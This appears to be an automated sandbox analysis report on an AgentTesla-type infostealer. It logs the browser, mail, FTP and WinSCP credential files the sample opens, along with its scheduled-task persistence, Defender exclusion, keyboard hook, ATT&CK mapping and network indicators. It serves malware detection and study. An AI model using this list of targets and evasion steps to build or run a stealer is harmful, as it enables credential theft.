Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Users\user\Desktop\jKqPSehspS.exe VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Users\user\AppData\Roaming\BLpvFR.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Users\user\AppData\Roaming\BLpvFR.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.jKqPSehspS.exe.4259970.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.jKqPSehspS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4294390.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3946068127.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3946194292.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: jKqPSehspS.exe PID: 1308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jKqPSehspS.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: BLpvFR.exe PID: 7408, type: MEMORYSTR
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\jKqPSehspS.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\jKqPSehspS.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\jKqPSehspS.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\BLpvFR.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4259970.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.jKqPSehspS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4294390.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3946194292.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: jKqPSehspS.exe PID: 1308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jKqPSehspS.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: BLpvFR.exe PID: 7408, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 0.2.jKqPSehspS.exe.4259970.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.jKqPSehspS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4294390.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3946068127.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.3946194292.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: jKqPSehspS.exe PID: 1308, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jKqPSehspS.exe PID: 6784, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: BLpvFR.exe PID: 7408, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; a number preceding a technique is the count badge from the report's matrix, kept as extracted; techniques without a number were not matched):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 121 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 2 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 111 Process Injection; Indicator Removal from Tools
Credential Access: 2 OS Credential Dumping; 11 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 1 Query Registry; 211 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 11 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1588702, Sample: jKqPSehspS.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100)

Start (node 2)
  DNS/IP: mail.iaa-airferight.com; api.ipify.org; 206.23.85.13.in-addr.arpa
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 7 other signatures
  Started: jKqPSehspS.exe (node 8); BLpvFR.exe (node 12)

jKqPSehspS.exe (node 8)
  Dropped: C:\Users\user\AppData\Roaming\BLpvFR.exe (PE32); C:\Users\user\...\BLpvFR.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\Temp\tmp89B.tmp (XML); C:\Users\user\AppData\...\jKqPSehspS.exe.log (ASCII)
  Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
  Started: jKqPSehspS.exe (node 14); powershell.exe (node 18); powershell.exe (node 20); schtasks.exe (node 22)

BLpvFR.exe (node 12)
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign processes
  Started: BLpvFR.exe (node 24); schtasks.exe (node 26)

jKqPSehspS.exe (node 14)
  DNS/IP: api.ipify.org 104.26.12.205, 443, 49707, 49711 CLOUDFLARENETUS United States; mail.iaa-airferight.com 46.175.148.58, 25 ASLAGIDKOM-NETUA Ukraine
  Signatures: Installs a global keyboard hook

powershell.exe (node 18)
  Signatures: Loading BitLocker PowerShell Module
  Started: conhost.exe (node 28); WmiPrvSE.exe (node 30)

powershell.exe (node 20)
  Started: conhost.exe (node 32)

schtasks.exe (node 22)
  Started: conhost.exe (node 34)

BLpvFR.exe (node 24)
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)

schtasks.exe (node 26)
  Started: conhost.exe (node 36)

Source / Detection / Scanner / Label:
jKqPSehspS.exe: 79%, Virustotal
jKqPSehspS.exe: 91%, ReversingLabs, Win32.Trojan.AgentTesla
jKqPSehspS.exe: 100%, Joe Sandbox ML
Source / Detection / Scanner / Label:
C:\Users\user\AppData\Roaming\BLpvFR.exe: 100%, Joe Sandbox ML
C:\Users\user\AppData\Roaming\BLpvFR.exe: 91%, ReversingLabs, Win32.Trojan.AgentTesla
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name / IP / Active / Malicious / Antivirus Detection / Reputation:
mail.iaa-airferight.com, 46.175.148.58, active: true, malicious: false, reputation: high
api.ipify.org, 104.26.12.205, active: true, malicious: false, reputation: high
206.23.85.13.in-addr.arpa, IP: unknown, active: unknown, malicious: false, reputation: high
Name / Malicious / Antivirus Detection / Reputation:
https://api.ipify.org/, malicious: false, reputation: high
Name / Source / Malicious / Antivirus Detection / Reputation:
https://api.ipify.org; sources: jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
http://localhost/arkanoid_server/requests.php; sources: jKqPSehspS.exe, BLpvFR.exe.0.dr; malicious: false; reputation: high
